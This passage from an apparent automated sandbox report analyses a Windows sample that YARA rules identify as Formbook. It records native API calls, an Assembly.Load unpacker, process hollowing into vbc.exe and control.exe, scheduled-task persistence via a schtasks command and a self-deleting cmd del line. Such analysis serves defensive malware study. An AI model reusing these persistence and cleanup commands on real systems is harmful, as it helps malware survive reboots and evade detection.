          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031083A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_03108270 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031082F0 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031081C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310826A NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031081BA NtCreateFile,
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_00E58D5D
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303CAE4
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEA2
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeCode function: 0_2_0303EEB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B8A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C23F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C2AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C3DF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041CC13
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B4A3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041BE60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C603
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054925DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549DFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05491FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E6E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548D616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053E4120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05481002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0549E824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054928EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053DB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054920A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05492B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FEBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054803DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548DBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054922AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDD466
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2841F
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2D5E0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE25DD
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E42581
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE1D55
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E10D20
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2D07
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2EF7
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E36E30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDD616
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE1FF1
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EEDFCE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE28EC
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E420A0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE20A8
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E2B090
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EEE824
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED1002
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E34120
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E1F900
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE22AE
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04ED03DA
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EDDBD2
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E4EBB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04EE2B28
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F2FB0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310C603
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F2D90
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310CC13
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030F8C60
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exe 767B1B32D4AC4CEC73967590CA5B28C3E0F4D709C0773E3F4021774F15A2483A
          Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04E1B150 appears 45 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 053CB150 appears 45 times
          Source: J0OmHIagw8.exeBinary or memory string: OriginalFilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.241605025.000000000442C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242728474.0000000006AF0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exe, 00000000.00000002.242891757.0000000006BE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exeBinary or memory string: OriginalFilename2 vs J0OmHIagw8.exe
          Source: J0OmHIagw8.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.241423456.0000000004269000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: J0OmHIagw8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Security.AccessControl.DirectorySecurity System.IO.DirectoryInfo::GetAccessControl()
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/3@20/11
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeMutant created: \Sessions\1\BaseNamedObjects\BrtavqaRGzDKtjCLSCLufFEEs
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF65F.tmpJump to behavior
          Source: J0OmHIagw8.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: J0OmHIagw8.exeVirustotal: Detection: 31%
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile read: C:\Users\user\Desktop\J0OmHIagw8.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\J0OmHIagw8.exe 'C:\Users\user\Desktop\J0OmHIagw8.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: J0OmHIagw8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: J0OmHIagw8.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: J0OmHIagw8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, control.exe, 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
          Source: Binary string: vbc.pdb source: control.exe, 00000008.00000002.576699588.00000000055C7000.00000004.00000001.sdmp
          Source: Binary string: control.pdbUGP source: vbc.exe, 00000005.00000002.275978124.0000000005108000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: J0OmHIagw8.exe, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: JcEEHoQdnETCO.exe.0.dr, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.J0OmHIagw8.exe.e50000.0.unpack, ParentalControl/ParentalControl.cs.Net Code: wx System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0x8C6CE96A [Sat Aug 27 21:58:02 2044 UTC]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041508E push ebp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040C2CA push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040C31A push ds; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_004153DF pushad ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B3B5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B46C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B402 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0041B40B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_00414DDA pushfd ; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0040EEAA push esp; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0541D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04E6D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FC31A push ds; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_031053DF pushad ; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FC2CA push ds; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310C9C8 push dword ptr [ECF9F4C6h]; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310508E push ebp; iretd
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_030FEEAA push esp; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_03104DDA pushfd ; retf
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B402 push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B40B push eax; ret
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0310B46C push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: initial sampleStatic PE information: section name: .text entropy: 7.87325624696
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeFile created: C:\Users\user\AppData\Roaming\JcEEHoQdnETCO.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\J0OmHIagw8.exeProcess information set: NOOPENFILEERRORBOX
